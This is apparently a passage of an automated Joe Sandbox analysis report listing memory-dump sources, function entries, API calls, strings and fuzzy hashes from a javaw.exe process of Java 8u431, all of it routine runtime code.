Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: CreateEvent
String ID: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\os\windows\vm\os_windows.hpp$C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\runtime\park.cpp$ParkerFreeListAllocate$guarantee(_ParkEvent != NULL) failed$guarantee(p->AssociatedWith == NULL) failed$guarantee(t != NULL) failed$invariant
API String ID: 2692171526-3039670605
Opcode ID: 15d65f06e729538f6da5c9c7a3bdba2ed7e18cdbc6d372c7b3a25351a8a661ae
Instruction ID: b317506da805921341e70645ed7f7299d6511b120b728333d8aa9bc7d527b4f8
Opcode Fuzzy Hash: 15d65f06e729538f6da5c9c7a3bdba2ed7e18cdbc6d372c7b3a25351a8a661ae
Instruction Fuzzy Hash: E121F871A407219FD3205F56ED01B22F7E0DF50B27F11882AEA58AAA42E7B5A5408BC3

Function 6FAB780A Relevance: 13.9, APIs: 6, Strings: 3, Instructions: 352COMMON

Download Yara Rule

APIs

Part of subcall function 6FA7BF2A: strlen.MSVCRT ref: 6FA7BF37

memcmp.MSVCRT ref: 6FAB7858
memcmp.MSVCRT ref: 6FAB7919
memcmp.MSVCRT ref: 6FAB7AC4
memcmp.MSVCRT ref: 6FAB7B17
memcmp.MSVCRT ref: 6FAB7B7B
memcmp.MSVCRT ref: 6FAB7BAF

Strings

cache, xrefs: 6FAB7BA8, 6FAB7BBF
access, xrefs: 6FAB7AD4
@, xrefs: 6FAB7829

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: memcmp$strlen
String ID: @$access$cache
API String ID: 3738950036-1361544076
Opcode ID: ebdea950cad1e03dc8ad13142941a3747ff0d75682217bd06a2924e6e8aa9587
Instruction ID: 6bfca9e0865b4f21b12b858034be11e9bc93028b9a6c081a847884ad4133ec1e
Opcode Fuzzy Hash: ebdea950cad1e03dc8ad13142941a3747ff0d75682217bd06a2924e6e8aa9587
Instruction Fuzzy Hash: 95D160B4D083568FDB01CF68C5807ADBBF9AF4A314F18845ED895AB341D7BDA881CB52

Function 6FA550CB Relevance: 13.6, APIs: 9, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6FA55112
___scrt_uninitialize_crt.LIBCMT ref: 6FA5512C

Memory Dump Source

Source File: 00000010.00000002.3208903167.000000006FA41000.00000020.00000001.01000000.00000018.sdmp, Offset: 6FA40000, based on PE: true

Associated: 00000010.00000002.3208878111.000000006FA40000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208959533.000000006FA5F000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208984957.000000006FA60000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa40000_javaw.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 96e613df3687d9bab791219497805a93adbe19a522d3befc1ca5798f069d36f2
Instruction ID: e09051bd6816e6952792f2cacf0dd0cd0cf37c1b21b5782f015538579c32ebfc
Opcode Fuzzy Hash: 96e613df3687d9bab791219497805a93adbe19a522d3befc1ca5798f069d36f2
Instruction Fuzzy Hash: 1A419272D05714EFDB109FACCD40B9E7AB5FF45AACF14811AE8146B290D73C59B28BA0

Function 6D5EB580 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 122synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?), ref: 6D5EB689

Strings

guarantee((v == 0) || (v == 1)) failed, xrefs: 6D5EB634
guarantee(Millis > 0) failed, xrefs: 6D5EB5C4
invariant, xrefs: 6D5EB62F
guarantee(_ParkHandle != NULL) failed, xrefs: 6D5EB599
C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\os\windows\vm\os_windows.cpp, xrefs: 6D5EB5A3, 6D5EB5CE, 6D5EB63E
Invariant, xrefs: 6D5EB594, 6D5EB5BF

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: ObjectSingleWait
String ID: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\os\windows\vm\os_windows.cpp$Invariant$guarantee((v == 0) || (v == 1)) failed$guarantee(Millis > 0) failed$guarantee(_ParkHandle != NULL) failed$invariant
API String ID: 24740636-3052590257
Opcode ID: f03daf7fe4e64565439e8b69eb8bd80ff2af59c90c08018527355ab52a38e103
Instruction ID: a1db70d2997a846c728a332e3f5f651a5677c6fc5c5a20fa43c9a0792411ed7e
Opcode Fuzzy Hash: f03daf7fe4e64565439e8b69eb8bd80ff2af59c90c08018527355ab52a38e103
Instruction Fuzzy Hash: 60412871D0430A9FEB08FF54CA40BB977B1FF5536AF1149A9E82497A51E7318A40CB82

Function 00E05F9D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(80000001,00000000,?,00000104), ref: 00E05FD9
RegEnumKeyA.ADVAPI32(80000001,00000001,?,00000104), ref: 00E0602F
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00E0604B
RegCloseKey.ADVAPI32 ref: 00E06064
RegQueryValueExA.ADVAPI32 ref: 00E060A3
RegCloseKey.ADVAPI32 ref: 00E060B5

Part of subcall function 00E06406: _strpbrk.LIBCMT ref: 00E0643E
Part of subcall function 00E06406: _strpbrk.LIBCMT ref: 00E0645A

Strings

JavaHome, xrefs: 00E0609B

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: CloseEnum_strpbrk$OpenQueryValue
String ID: JavaHome
API String ID: 3676537333-2033683150
Opcode ID: 7c707841e1768222fca6f8aabeff936a15688c85c1f48bf0095057bc25031484
Instruction ID: 39c44a3b88a93abf38de0419aa776654500f69285465b1dbc6a4a57d374c99c8
Opcode Fuzzy Hash: 7c707841e1768222fca6f8aabeff936a15688c85c1f48bf0095057bc25031484
Instruction Fuzzy Hash: 9631307290111D9FEB349BB1DC85EEE7BBCEF04758F20102AF505F7192DB7099998A60

Function 6D5EB6F0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6D5EB7B5

Strings

guarantee(_Event >= 0) failed, xrefs: 6D5EB7F0
guarantee((v == 0) || (v == 1)) failed, xrefs: 6D5EB77D
invariant, xrefs: 6D5EB778, 6D5EB7EB
guarantee(_ParkHandle != NULL) failed, xrefs: 6D5EB709
C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\os\windows\vm\os_windows.cpp, xrefs: 6D5EB713, 6D5EB787, 6D5EB7FA
Invariant, xrefs: 6D5EB704

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: ObjectSingleWait
String ID: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\os\windows\vm\os_windows.cpp$Invariant$guarantee((v == 0) || (v == 1)) failed$guarantee(_Event >= 0) failed$guarantee(_ParkHandle != NULL) failed$invariant
API String ID: 24740636-2593385341
Opcode ID: dad235f5104f31b95eb2efd17322c43ba87c327712857978176b9528b40a99cb
Instruction ID: 381a82bcf77da19a9e0b4e9fa27dec57c621cfbd8c579a5d8d743154625de09e
Opcode Fuzzy Hash: dad235f5104f31b95eb2efd17322c43ba87c327712857978176b9528b40a99cb
Instruction Fuzzy Hash: 5431E470848319AFDF09FF54C9407A9B3B1FB4536BF100AA9D91CA6E82DB715A40CB82

Function 00E2448F Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,00E2475F,00000000,00000000,?,00000001,?,?,?,?,00000001,?), ref: 00E24535
__alloca_probe_16.LIBCMT ref: 00E245F0
__alloca_probe_16.LIBCMT ref: 00E2467F
__freea.LIBCMT ref: 00E246CA
__freea.LIBCMT ref: 00E246D0
__freea.LIBCMT ref: 00E24706
__freea.LIBCMT ref: 00E2470C
__freea.LIBCMT ref: 00E2471C

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 336987fd087d85e37567969baf91b574ada5e1add7602690b46a68cdca022203
Instruction ID: 99a36a6109c2eb52f77569ec9a24101b1ad407ce9c86e9bd48e8a86cc7e29201
Opcode Fuzzy Hash: 336987fd087d85e37567969baf91b574ada5e1add7602690b46a68cdca022203
Instruction Fuzzy Hash: 917106F2900229ABDF21AF64AC41BEE77E6AF4A354F292059E954B72C1E775CD00C790

Function 6FA46B2D Relevance: 12.1, APIs: 8, Instructions: 85COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000028,00000000,00000000,?,6FA46C83,?,?,6FA4665B,?,?,?,?,?,6FA42436,?), ref: 6FA46B34
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,?,?,?,6FA418B8,?,?,?,00000000,?,?,00000000), ref: 6FA46B57
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?,00000000,?,?,00000000), ref: 6FA46B79
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?,00000000,?,?,00000000), ref: 6FA46B8C
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?,00000000,?,?,00000000), ref: 6FA46B9F
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?,00000000,?,?,00000000), ref: 6FA46BB2
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?,00000000,?,?,00000000), ref: 6FA46BC5
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?,00000000,?,?,00000000), ref: 6FA46BD8

Memory Dump Source

Source File: 00000010.00000002.3208903167.000000006FA41000.00000020.00000001.01000000.00000018.sdmp, Offset: 6FA40000, based on PE: true

Associated: 00000010.00000002.3208878111.000000006FA40000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208959533.000000006FA5F000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208984957.000000006FA60000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa40000_javaw.jbxd

Similarity

API ID: _strdup$calloc
String ID:
API String ID: 4283692972-0
Opcode ID: 1411994436032369305468f40775a04522a3a1c688bfc2b7e37ff704372d286b
Instruction ID: 6bebc66a98212e50191f49a4df9fa200e06c69bd89dd63a03744e88ceb35e790
Opcode Fuzzy Hash: 1411994436032369305468f40775a04522a3a1c688bfc2b7e37ff704372d286b
Instruction Fuzzy Hash: A421E875144B02AFE7169F26D840B91F7E4BF06325F14862BD464C2F90EB39F4E5CA94

Function 6FB202D0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 395COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6FB20480
memset.MSVCRT ref: 6FB2059F

Strings

o, xrefs: 6FB207E8
0, xrefs: 6FB207C7

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: fputcmemset
String ID: 0$o
API String ID: 947785774-4157579757
Opcode ID: abd8dc621a9957ba8d91964551e39c77a2e5f58d0bcb68e3196c2dac97f66ce3
Instruction ID: 6efecf1d2e06ab3eda8566c16650181077c037d664bec3c3549233ce90c59520
Opcode Fuzzy Hash: abd8dc621a9957ba8d91964551e39c77a2e5f58d0bcb68e3196c2dac97f66ce3
Instruction Fuzzy Hash: 6FF14E71E142948FDB04CF68E5A43ADBBF1FF88354F159269E869AB385D334E841CB90

Function 00E1BAC1 Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00E1BB47

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 3278a5a03930a09dabf765165e71b7dc64ba36aec8363d996e279c0aa3f17d0d
Instruction ID: c897e624a4fd90f1dea5fdef5d469f90bf94e34a24a1386a0c8894d9b14d2272
Opcode Fuzzy Hash: 3278a5a03930a09dabf765165e71b7dc64ba36aec8363d996e279c0aa3f17d0d
Instruction Fuzzy Hash: 91B15672A043959FDB15CF28CC82BEEBBE5EF55314F186165E804BB382D7749981C7A0

Function 00E0C100 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E0C137
___except_validate_context_record.LIBVCRUNTIME ref: 00E0C13F
_ValidateLocalCookies.LIBCMT ref: 00E0C1C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00E0C1F3
_ValidateLocalCookies.LIBCMT ref: 00E0C248

Strings

csm, xrefs: 00E0C1DD

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5d4aaab501eee16a5a83ce9bb5a001218009e46b47138188cb3c32afc236cb36
Instruction ID: 9cddab400328214f777aa6e2c50921bf4d09d2fe58fed0281708bd376d1eedab
Opcode Fuzzy Hash: 5d4aaab501eee16a5a83ce9bb5a001218009e46b47138188cb3c32afc236cb36
Instruction Fuzzy Hash: 7A41C034A01218EFCF10DF68C885A9EBBF0AF45318F249255E814BB3D2D731EA85CB91

Function 00E01000 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00E01059

Strings

wwwd_args[%d] = %s, xrefs: 00E01042
1.8.0_431-b10, xrefs: 00E010CE
_JAVA_LAUNCHER_DEBUG, xrefs: 00E01009
1.8, xrefs: 00E010C9
Windows original main args:, xrefs: 00E01021

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: CommandLine
String ID: 1.8$1.8.0_431-b10$Windows original main args:$_JAVA_LAUNCHER_DEBUG$wwwd_args[%d] = %s
API String ID: 3253501508-2285579258
Opcode ID: c7e3aa38d23cef60dfe91cb3a73b8a71c866c5fb2ab61f120400afaa7da4d7af
Instruction ID: 2a4d74962c1e4e15aee6cff0294fbdb471cb7fbf837b06747ec8903f79084a6e
Opcode Fuzzy Hash: c7e3aa38d23cef60dfe91cb3a73b8a71c866c5fb2ab61f120400afaa7da4d7af
Instruction Fuzzy Hash: 83212872600218BFC6246FE5BC46D6B3BADDBC63147116099F1817F1A2DE71A8C1DBE0

Function 6FA5517B Relevance: 10.6, APIs: 7, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6FA551B8
dllmain_crt_dispatch.LIBCMT ref: 6FA551CF
_DllMain@12.MSVCRT ref: 6FA551E6
_DllMain@12.MSVCRT ref: 6FA551FE
dllmain_raw.LIBCMT ref: 6FA55217
dllmain_crt_dispatch.LIBCMT ref: 6FA5522A
dllmain_raw.LIBCMT ref: 6FA5523D

Memory Dump Source

Source File: 00000010.00000002.3208903167.000000006FA41000.00000020.00000001.01000000.00000018.sdmp, Offset: 6FA40000, based on PE: true

Associated: 00000010.00000002.3208878111.000000006FA40000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208959533.000000006FA5F000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208984957.000000006FA60000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa40000_javaw.jbxd

Similarity

API ID: dllmain_raw$Main@12dllmain_crt_dispatch
String ID:
API String ID: 3353612457-0
Opcode ID: 9fdd56eb7312a3ef5667284032bed1db66c0505c50a4c6aef668ecee64da6cdb
Instruction ID: 6652dc031d37222a22a53ad6cfeb8c90e9d967fa8b82ef22b4e48a3306525aed
Opcode Fuzzy Hash: 9fdd56eb7312a3ef5667284032bed1db66c0505c50a4c6aef668ecee64da6cdb
Instruction Fuzzy Hash: 4F218371D05728AFCB215E6CCD40EAF3A79EF85A9CF058115F8145B254D7389DB18BE0

Function 6FA46BF9 Relevance: 10.0, APIs: 8, Instructions: 47COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,6FA46BF2,00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?), ref: 6FA46C10
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,6FA46BF2,00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?), ref: 6FA46C1C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,6FA46BF2,00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?), ref: 6FA46C28
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,6FA46BF2,00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?), ref: 6FA46C34
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,6FA46BF2,00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?), ref: 6FA46C40
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,6FA46BF2,00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?), ref: 6FA46C4C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,6FA46BF2,00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?), ref: 6FA46C58
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000000,6FA46BF2,00000000,?,00000000,?,?,?,?,?,6FA418B8,?,?,?), ref: 6FA46C5C

Memory Dump Source

Source File: 00000010.00000002.3208903167.000000006FA41000.00000020.00000001.01000000.00000018.sdmp, Offset: 6FA40000, based on PE: true

Associated: 00000010.00000002.3208878111.000000006FA40000.00000002.00000001.01000000.00000018.sdmpDownload File
